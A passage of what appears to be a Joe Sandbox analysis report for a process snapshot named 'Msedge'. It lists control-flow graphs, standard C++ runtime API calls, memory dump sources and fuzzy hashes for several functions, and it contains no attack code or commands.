                                    • Instruction Fuzzy Hash: 0361F622B08F8194EE249F16A91436DA761FB08FD0F5C8531DF5D4BBA5DE7CE081A306

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 355 7ff62b646ccc-7ff62b646cf2 356 7ff62b646d1a-7ff62b646d1d 355->356 357 7ff62b646cf4-7ff62b646d18 ?tolower@?$ctype@D@std@@QEBADD@Z * 2 355->357 358 7ff62b646d1f-7ff62b646d25 356->358 357->358 359 7ff62b646d2b 358->359 360 7ff62b646e4f-7ff62b646e67 358->360 361 7ff62b646d31-7ff62b646d3b call 7ff62b648ea0 359->361 364 7ff62b646d3d-7ff62b646d44 361->364 365 7ff62b646d8b-7ff62b646d8d 361->365 366 7ff62b646d46 364->366 367 7ff62b646d70-7ff62b646d89 364->367 365->360 368 7ff62b646d93-7ff62b646da1 call 7ff62b648f34 365->368 369 7ff62b646d49 call 7ff62b64cc88 366->369 367->361 367->365 373 7ff62b646db9-7ff62b646dc0 368->373 374 7ff62b646da3-7ff62b646db2 call 7ff62b646844 368->374 372 7ff62b646d4e-7ff62b646d59 369->372 375 7ff62b646d5b-7ff62b646d68 memset 372->375 376 7ff62b646d6a 372->376 378 7ff62b646deb-7ff62b646df4 373->378 379 7ff62b646dc2 373->379 387 7ff62b646db4 374->387 380 7ff62b646d6c 375->380 376->380 383 7ff62b646df6-7ff62b646e07 realloc 378->383 384 7ff62b646e0e-7ff62b646e28 378->384 382 7ff62b646dc5 call 7ff62b64cc88 379->382 380->367 388 7ff62b646dca-7ff62b646dd5 382->388 389 7ff62b646e09-7ff62b646e0c 383->389 390 7ff62b646e6e-7ff62b646e73 ?_Xbad_alloc@std@@YAXXZ 383->390 385 7ff62b646e2a-7ff62b646e3b realloc 384->385 386 7ff62b646e42-7ff62b646e4c 384->386 391 7ff62b646e68-7ff62b646e6d call 7ff62b64c8c1 385->391 392 7ff62b646e3d-7ff62b646e40 385->392 386->360 387->360 393 7ff62b646dd7-7ff62b646de3 388->393 394 7ff62b646de5 388->394 389->384 391->390 392->386 396 7ff62b646de7 393->396 394->396 396->378
                                    APIs
                                    • ?tolower@?$ctype@D@std@@QEBADD@Z.MSVCP140(?,?,?,00007FF62B647EBF,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B646CFC
                                    • ?tolower@?$ctype@D@std@@QEBADD@Z.MSVCP140(?,?,?,00007FF62B647EBF,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B646D0F
                                    • memset.VCRUNTIME140(?,?,?,00007FF62B647EBF,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B646D63
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62B647EBF,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B646DFE
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62B647EBF,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B646E32
                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,00007FF62B647EBF,?,?,?,?,?,?,?,00007FF62B647CE8), ref: 00007FF62B646E6E
                                      • Part of subcall function 00007FF62B64CC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62B648F80), ref: 00007FF62B64CCA2
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: ?tolower@?$ctype@D@std@@realloc$Xbad_alloc@std@@mallocmemset
                                    • String ID:
                                    • API String ID: 3661150764-0
                                    • Opcode ID: 013138b7fa9eaf1f874e2d65456e622f28f172764970678887205d3d68904c82
                                    • Instruction ID: 1d87b76c399e9a05c061b27bbc369c361ff4a7c89455f7fbb4734f08d290f0a9
                                    • Opcode Fuzzy Hash: 013138b7fa9eaf1f874e2d65456e622f28f172764970678887205d3d68904c82
                                    • Instruction Fuzzy Hash: E2516D32A09E428AEF619F25D8A027DB7B1FB48F84F498035DA5D87365DE3CE841A351

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 2016347663-0
                                    • Opcode ID: 26b11adda677e6b343809b3a9c1f49ea10735b2f8080227b866242dc9828e6e7
                                    • Instruction ID: f88f0a4b9fc6275c15a28ea392be1636efa49f6b5842a3cd3580ddc18ebc0b35
                                    • Opcode Fuzzy Hash: 26b11adda677e6b343809b3a9c1f49ea10735b2f8080227b866242dc9828e6e7
                                    • Instruction Fuzzy Hash: B141C662B08E4195EE249B16F9142A9A761FB0CFE0F584631DE6D877E5DE3CD0819305

                                    Control-flow Graph

                                    APIs
                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF62B642F46
                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF62B642F4D
                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF62B642F5B
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@
                                    • String ID:
                                    • API String ID: 2077694045-0
                                    • Opcode ID: 453be39fce51d7f91d2905c70a9c180258c8c2645e76f728006da0f14fafa6d1
                                    • Instruction ID: 60a0e9cab55e06e57f4c025a701d38399e26bef4155d189824d53f36ad1678a3
                                    • Opcode Fuzzy Hash: 453be39fce51d7f91d2905c70a9c180258c8c2645e76f728006da0f14fafa6d1
                                    • Instruction Fuzzy Hash: 2B414D62A18E4581EF208F15D9A023DA7B1FB89F95F658532DE8D87778CE3CD886D301

                                    Control-flow Graph

                                    APIs
                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF62B64195F
                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF62B641986
                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF62B6419A6
                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF62B6419E4
                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF62B6419EB
                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF62B6419F9
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@
                                    • String ID:
                                    • API String ID: 3901553425-0
                                    • Opcode ID: 3899ee91e1b713a6a50820146165eb8bad4d2aa0730d0caa4019f4f0777c2472
                                    • Instruction ID: 22450f124bf5684480aacac78980d8d847e6d3fa92c1939ae3e6440238de4fc0
                                    • Opcode Fuzzy Hash: 3899ee91e1b713a6a50820146165eb8bad4d2aa0730d0caa4019f4f0777c2472
                                    • Instruction Fuzzy Hash: BD413332A09E9185EF308B15D9E02396BB1FB49BA5F148631CF6D937B5CF38D4959301

                                    Control-flow Graph

                                    APIs
                                    • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(00000008,?,?,00007FF62B645197,?,?,?,00007FF62B6447D8,?,?,?,?,?,?,?,00007FF62B642382), ref: 00007FF62B644CDA
                                    • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,00007FF62B645197,?,?,?,00007FF62B6447D8,?,?,?,?,?,?,?,00007FF62B642382), ref: 00007FF62B644CF4
                                    • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,00007FF62B645197,?,?,?,00007FF62B6447D8,?,?,?,?,?,?,?,00007FF62B642382), ref: 00007FF62B644D26
                                    • ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,00007FF62B645197,?,?,?,00007FF62B6447D8,?,?,?,?,?,?,?,00007FF62B642382), ref: 00007FF62B644D50
                                    • std::_Facet_Register.LIBCPMT ref: 00007FF62B644D69
                                    • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,00007FF62B645197,?,?,?,00007FF62B6447D8,?,?,?,?,?,?,?,00007FF62B642382), ref: 00007FF62B644D88
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                    • String ID:
                                    • API String ID: 295490909-0
                                    • Opcode ID: bb4b9fba70b8cdda44d29502ec8ea9042cfbc8abe3e100e0a9e7bdf86edccc93
                                    • Instruction ID: 0717ad41bf5e3b5352b21ddbe0cafc050b50728567b969c879ee93c8b63af876
                                    • Opcode Fuzzy Hash: bb4b9fba70b8cdda44d29502ec8ea9042cfbc8abe3e100e0a9e7bdf86edccc93
                                    • Instruction Fuzzy Hash: E4215A26A09E4185EE249F15E8602B96770FB8DB94F0C1131DB5D83BB9DE3DD490D301

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 601 7ff62b644390-7ff62b6443bc 602 7ff62b6444c2-7ff62b6444c7 call 7ff62b64a594 601->602 603 7ff62b6443c2-7ff62b6443e7 601->603 613 7ff62b6444c8-7ff62b6444f3 call 7ff62b649fc8 602->613 605 7ff62b6443e9-7ff62b6443f5 603->605 606 7ff62b6443f7-7ff62b6443fe 603->606 608 7ff62b64441c-7ff62b644429 call 7ff62b641a70 605->608 609 7ff62b64442b-7ff62b64442e 606->609 610 7ff62b644400 606->610 618 7ff62b644451-7ff62b64446a call 7ff62b642f98 608->618 609->613 614 7ff62b644434 609->614 611 7ff62b644403-7ff62b64441a 610->611 611->608 615 7ff62b644436-7ff62b644439 611->615 627 7ff62b6444f9-7ff62b64451e 613->627 628 7ff62b6445d1-7ff62b6445d6 call 7ff62b64a594 613->628 614->611 619 7ff62b64443b 615->619 620 7ff62b64444a 615->620 633 7ff62b644479-7ff62b64447c 618->633 634 7ff62b64446c-7ff62b644477 call 7ff62b642908 618->634 622 7ff62b64443b call 7ff62b64cc88 619->622 623 7ff62b64444c 620->623 626 7ff62b644440-7ff62b644448 622->626 623->618 626->623 631 7ff62b644520-7ff62b64452c 627->631 632 7ff62b64452e-7ff62b644535 627->632 645 7ff62b6445d7-7ff62b6445df call 7ff62b649fc8 628->645 641 7ff62b644552-7ff62b64455f call 7ff62b641a70 631->641 636 7ff62b644537 632->636 637 7ff62b644561-7ff62b644564 632->637 638 7ff62b64447e 633->638 639 7ff62b644492-7ff62b647826 call 7ff62b6426b8 633->639 634->639 643 7ff62b64453a-7ff62b644550 636->643 637->645 646 7ff62b644566 637->646 644 7ff62b644483-7ff62b644490 638->644 658 7ff62b647859-7ff62b647880 639->658 659 7ff62b647828-7ff62b64783a 639->659 657 7ff62b644588-7ff62b644598 641->657 643->641 649 7ff62b644568-7ff62b64456d 643->649 644->639 644->644 661 7ff62b647888-7ff62b6478ae 645->661 646->643 653 7ff62b64456f 649->653 654 7ff62b64457e 649->654 660 7ff62b64456f call 7ff62b64cc88 653->660 662 7ff62b644583 654->662 663 7ff62b64459a-7ff62b6445a0 memset 657->663 664 7ff62b6445a5-7ff62b6445cc call 7ff62b6426b8 657->664 665 7ff62b64783c-7ff62b64784f 659->665 666 7ff62b647854 call 7ff62b64ccc4 659->666 668 7ff62b644574-7ff62b64457c 660->668 669 7ff62b6478e1-7ff62b64790e 661->669 670 7ff62b6478b0-7ff62b6478c2 661->670 662->657 663->664 664->661 671 7ff62b647881-7ff62b647887 _invalid_parameter_noinfo_noreturn 665->671 672 7ff62b647851 665->672 666->658 668->662 675 7ff62b6478dc call 7ff62b64ccc4 670->675 676 7ff62b6478c4-7ff62b6478d7 670->676 671->661 672->666 675->669 677 7ff62b6478d9 676->677 678 7ff62b64790f-7ff62b64793f _invalid_parameter_noinfo_noreturn 676->678 677->675 681 7ff62b647991-7ff62b6479c1 678->681 682 7ff62b647941-7ff62b647972 678->682 683 7ff62b64798c call 7ff62b64ccc4 682->683 684 7ff62b647974-7ff62b647987 682->684 683->681 686 7ff62b647989 684->686 687 7ff62b6479c2-7ff62b6479cb _invalid_parameter_noinfo_noreturn 684->687 686->683
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62B6444C8
                                    • memset.VCRUNTIME140(?,?,?,3FFFFFFFFFFFFFFF,?,?,?,00007FF62B644203,?,?,?,00007FF62B6492B5), ref: 00007FF62B6445A0
                                      • Part of subcall function 00007FF62B64CC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62B648F80), ref: 00007FF62B64CCA2
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: Concurrency::cancel_current_taskmallocmemset
                                    • String ID:
                                    • API String ID: 2179613399-0
                                    • Opcode ID: 2365e17c2eae6f2e067b7312316ce99b5e0f0170b1b83df64bb02dafa12a696b
                                    • Instruction ID: dddd4011f2ec742b740d3c14a42ae59ce190f15854405df3cf45ffa9627485fe
                                    • Opcode Fuzzy Hash: 2365e17c2eae6f2e067b7312316ce99b5e0f0170b1b83df64bb02dafa12a696b
                                    • Instruction Fuzzy Hash: 42D1C272B09A8581EE24CB56E86527963B4FB48BE0F588631DF6D87BE4CE3CD491D301

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 688 7ff62b642dac-7ff62b642daf 689 7ff62b642e27 688->689 690 7ff62b642db1-7ff62b642dd0 688->690 691 7ff62b642dd3-7ff62b642dde 690->691 692 7ff62b642dfa-7ff62b642e0b 691->692 693 7ff62b642de0-7ff62b642df2 realloc 691->693 692->691 696 7ff62b642e0d-7ff62b642e25 692->696 694 7ff62b642e28-7ff62b642e66 ?_Xbad_alloc@std@@YAXXZ 693->694 695 7ff62b642df4-7ff62b642df8 693->695 698 7ff62b642e68-7ff62b642e6b 694->698 699 7ff62b642e72 694->699 695->692 696->689 698->699 700 7ff62b642e6d-7ff62b642e70 698->700 701 7ff62b642e74-7ff62b642e87 call 7ff62b64564c 699->701 700->701 704 7ff62b642e89-7ff62b642e8e 701->704 705 7ff62b642e93-7ff62b642ea6 701->705 708 7ff62b642f37-7ff62b642f54 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 704->708 706 7ff62b642ea8-7ff62b642eab 705->706 707 7ff62b642ed6-7ff62b642ef1 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 705->707 706->707 709 7ff62b642ead-7ff62b642ec6 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 706->709 710 7ff62b642f13-7ff62b642f16 707->710 711 7ff62b642ef3-7ff62b642ef6 707->711 712 7ff62b642f56-7ff62b642f61 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 708->712 713 7ff62b642f62-7ff62b642f76 708->713 714 7ff62b642ec8-7ff62b642ecf 709->714 715 7ff62b642ed1-7ff62b642ed4 709->715 717 7ff62b642f1a-7ff62b642f27 710->717 716 7ff62b642ef8-7ff62b642f11 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 711->716 711->717 712->713 718 7ff62b642f78-7ff62b642f7e 713->718 719 7ff62b642f7f-7ff62b642f95 713->719 714->711 715->706 716->710 720 7ff62b642f29-7ff62b642f2c 716->720 717->708 718->719 720->708 720->711
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@Xbad_alloc@std@@realloc
                                    • String ID:
                                    • API String ID: 2487731983-0
                                    • Opcode ID: 4a1f6d03ca14bf1403e94171af387133f0202b7b6271c2f389aac75518f98b30
                                    • Instruction ID: fe1c984d1561f8a5a406740524e72fa3740693d4895162858fea2bb0cac2a785
                                    • Opcode Fuzzy Hash: 4a1f6d03ca14bf1403e94171af387133f0202b7b6271c2f389aac75518f98b30
                                    • Instruction Fuzzy Hash: 69414F32A18E8586EB219F15D990129BBB1FB88F84F588431DE8D87B69CE3CD852D701

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00007FF62B64CC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62B648F80), ref: 00007FF62B64CCA2
                                    • ??0_Locinfo@std@@QEAA@PEBD@Z.MSVCP140 ref: 00007FF62B648FB8
                                    • ??0facet@locale@std@@IEAA@_K@Z.MSVCP140 ref: 00007FF62B648FCF
                                    • ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@@XZ.MSVCP140 ref: 00007FF62B648FE8
                                    • ??1_Locinfo@std@@QEAA@XZ.MSVCP140 ref: 00007FF62B64900C
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62B649053
                                      • Part of subcall function 00007FF62B64B07C: ?c_str@?$_Yarn@D@std@@QEBAPEBDXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF62B648F9D), ref: 00007FF62B64B0B6
                                      • Part of subcall function 00007FF62B64B07C: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF62B648F9D), ref: 00007FF62B64B131
                                      • Part of subcall function 00007FF62B64B07C: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62B64B1C6
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: Locinfo@std@@$_invalid_parameter_noinfo_noreturn$??0_??0facet@locale@std@@??1_?c_str@?$_Collvec@@D@std@@Getcoll@_Yarn@mallocmemmove
                                    • String ID:
                                    • API String ID: 1602917343-0
                                    • Opcode ID: a78317c7dc147549a852ed621cc671225eacfe356231027a8034ae884b313f52
                                    • Instruction ID: ce46142e338724bbdc111f51030794802df17b73430b61ae0cfa8debd7bf7d16
                                    • Opcode Fuzzy Hash: a78317c7dc147549a852ed621cc671225eacfe356231027a8034ae884b313f52
                                    • Instruction Fuzzy Hash: 29314D22A09E8189EE34DB15EC6036A6261FF89BA0F544235DA9D837F5DF3CD485D601

                                    Control-flow Graph

                                    APIs
                                    • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,00000001,?,00007FF62B64523C,?,00000000,00000001,00007FF62B6410A1), ref: 00007FF62B644C01
                                    • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,00007FF62B64523C,?,00000000,00000001,00007FF62B6410A1), ref: 00007FF62B644C1B
                                    • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,00007FF62B64523C,?,00000000,00000001,00007FF62B6410A1), ref: 00007FF62B644C4D
                                    • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,00007FF62B64523C,?,00000000,00000001,00007FF62B6410A1), ref: 00007FF62B644CA9
                                      • Part of subcall function 00007FF62B648F38: ??0_Locinfo@std@@QEAA@PEBD@Z.MSVCP140 ref: 00007FF62B648FB8
                                      • Part of subcall function 00007FF62B648F38: ??0facet@locale@std@@IEAA@_K@Z.MSVCP140 ref: 00007FF62B648FCF
                                      • Part of subcall function 00007FF62B648F38: ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@@XZ.MSVCP140 ref: 00007FF62B648FE8
                                      • Part of subcall function 00007FF62B648F38: ??1_Locinfo@std@@QEAA@XZ.MSVCP140 ref: 00007FF62B64900C
                                      • Part of subcall function 00007FF62B648F38: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62B649053
                                    • std::_Facet_Register.LIBCPMT ref: 00007FF62B644C8F
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: Locinfo@std@@$??0_??1_Lockit@std@@$??0facet@locale@std@@Bid@locale@std@@Collvec@@Facet_Getcoll@_Getgloballocale@locale@std@@Locimp@12@Register_invalid_parameter_noinfo_noreturnstd::_
                                    • String ID:
                                    • API String ID: 1009702548-0
                                    • Opcode ID: 8e30e28fb1fac57f1a0170126ba30d028ebb790b07cd25a607e1e29078725d41
                                    • Instruction ID: ae4276ce4d5416fc36f6d5e52c87ffeaf13c83c9d3c67dc8ad99a1c040e77e74
                                    • Opcode Fuzzy Hash: 8e30e28fb1fac57f1a0170126ba30d028ebb790b07cd25a607e1e29078725d41
                                    • Instruction Fuzzy Hash: 13217426A08E4285EE259B51EC611BAA770FF8CBA0F0C0131DE5D877B5DE7CE485D301

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: __current_exception__current_exception_contextterminate
                                    • String ID: csm
                                    • API String ID: 2542180945-1018135373
                                    • Opcode ID: 4c4bbd4a42ae7351677d875046182b1a39caa59085d51b43aab2762be9c7daf4
                                    • Instruction ID: a7b03b6a494d7f2ccc1d52e7afe6045a4ee94fda0b307f89e11a6bcff457719a
                                    • Opcode Fuzzy Hash: 4c4bbd4a42ae7351677d875046182b1a39caa59085d51b43aab2762be9c7daf4
                                    • Instruction Fuzzy Hash: C7F0E237A09E45CACB249F62EC900AC3374F78CB88B496130FA8D87765CF38D8A09301
                                    APIs
                                    • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FF62B64A4CB,?,?,?,00007FF62B64AE85), ref: 00007FF62B64A577
                                    • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62B64AE85), ref: 00007FF62B64A58B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
